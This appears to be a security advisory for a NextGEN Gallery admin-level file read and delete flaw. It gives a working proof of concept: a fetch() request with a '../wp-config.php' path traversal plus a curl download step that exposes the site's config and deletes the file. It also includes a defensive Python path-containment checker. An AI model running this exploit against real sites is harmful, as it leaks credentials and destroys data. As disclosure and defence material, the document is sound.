wpexploit | Linwz from DEVCORE | WPEX-ID:5C8473F4-4B52-430B-9140-B81B0A0901DA
History: Sep 25, 2023 - 12:00 a.m.

NextGEN Gallery < 3.39 - Admin+ Arbitrary File Read and Delete

Tags: arbitrary file read, admin credentials, security exploit, file deletion, web security

EPSS: 0.001 (Low) | Percentile: 19.4%

Description

The plugin is vulnerable to Arbitrary File Read and Delete due to a lack of input parameter validation in the `gallery_edit` function: the `path` of each entry in `image_list` is accepted without being confined to the gallery directory, so an authenticated administrator (Admin+, as the title states) can make the plugin read, and then delete, arbitrary files on the server.

1. Create a Gallery called "My Gallery" and note its ID.
2. Run the following code in your browser, replacing ADMIN_USERNAME, ADMIN_PASSWORD, and GALLERY_ID accordingly.

```javascript
await (await fetch("/index.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
    },
    "body": 'photocrati_ajax=1&action=enqueue_nextgen_api_task_list&q=ADMIN_USERNAME&z=ADMIN_PASSWORD&app_config={}&task_list=[{"name":"x","type":"gallery_edit","query":{"id":"GALLERY_ID"},"object":{"name":"x","image_list":[{"path":"../wp-config.php","filename":"xxxxxxx.jpg"}]}}]&extra_data={}',
    "method": "POST",
    "mode": "cors"
})).text();
```

3. Download the file contents with the following `curl` command:

```shell
curl http://SITE_URL/wp-content/gallery/my-gallery/xxxxxxx.jpg
```

4. Note that the `wp-config.php` file has been deleted.
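The root cause described above is that `image_list[].path` is never checked against the gallery directory. The following Python module is an added example, not code from NextGEN Gallery or from the advisory author: it shows the containment check a defender would expect the plugin to perform, and applies it to a request body shaped like the PoC (for instance from a captured POST in a WAF or access log) to flag any image path that escapes the gallery root. The `GALLERY_ROOT` path and the sample body are constructed for the demonstration.

```python
"""Gallery image path containment check (added example, not plugin code)."""
import json
import os
from urllib.parse import parse_qs

# Assumed gallery directory for the demonstration; on a real site this would be
# the plugin's configured gallery root under wp-content.
GALLERY_ROOT = "/var/www/html/wp-content/gallery"

# Constructed sample request body in the shape used by the PoC above: one
# traversal path (the defect the advisory describes) and one legitimate path.
SAMPLE_BODY = (
    "photocrati_ajax=1&action=enqueue_nextgen_api_task_list&q=user&z=pass"
    "&app_config={}&task_list=" + json.dumps([{
        "name": "x", "type": "gallery_edit", "query": {"id": "3"},
        "object": {"name": "x", "image_list": [
            {"path": "../wp-config.php", "filename": "xxxxxxx.jpg"},
            {"path": "my-gallery/photo1.jpg", "filename": "photo1.jpg"},
        ]},
    }]) + "&extra_data={}"
)


def path_is_contained(base: str, candidate: str) -> bool:
    """Return True only if `candidate`, resolved relative to `base`, stays inside `base`.

    realpath() normalises '..' segments and follows symlinks, so the comparison
    is done on the final on-disk location rather than on the raw string.
    """
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, candidate))
    return os.path.commonpath([base_real, target]) == base_real


def find_escaping_paths(body: str, gallery_root: str = GALLERY_ROOT) -> list:
    """Parse a task_list POST body and return every gallery_edit image path that
    would resolve outside `gallery_root`. An empty list means the body is clean."""
    params = parse_qs(body, keep_blank_values=True)
    offending = []
    for raw in params.get("task_list", []):
        try:
            tasks = json.loads(raw)
        except json.JSONDecodeError:
            continue  # not a task list; nothing to check here
        for task in tasks:
            if task.get("type") != "gallery_edit":
                continue
            for image in task.get("object", {}).get("image_list", []):
                path = image.get("path", "")
                if not path_is_contained(gallery_root, path):
                    offending.append(path)
    return offending


if __name__ == "__main__":
    for bad in find_escaping_paths(SAMPLE_BODY):
        print(f"rejected image path outside gallery root: {bad!r}")
```

Run over the sample body, the module reports `../wp-config.php` and accepts `my-gallery/photo1.jpg`; the same `path_is_contained` check, applied before any file is copied or unlinked, is the fix shape the description implies.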
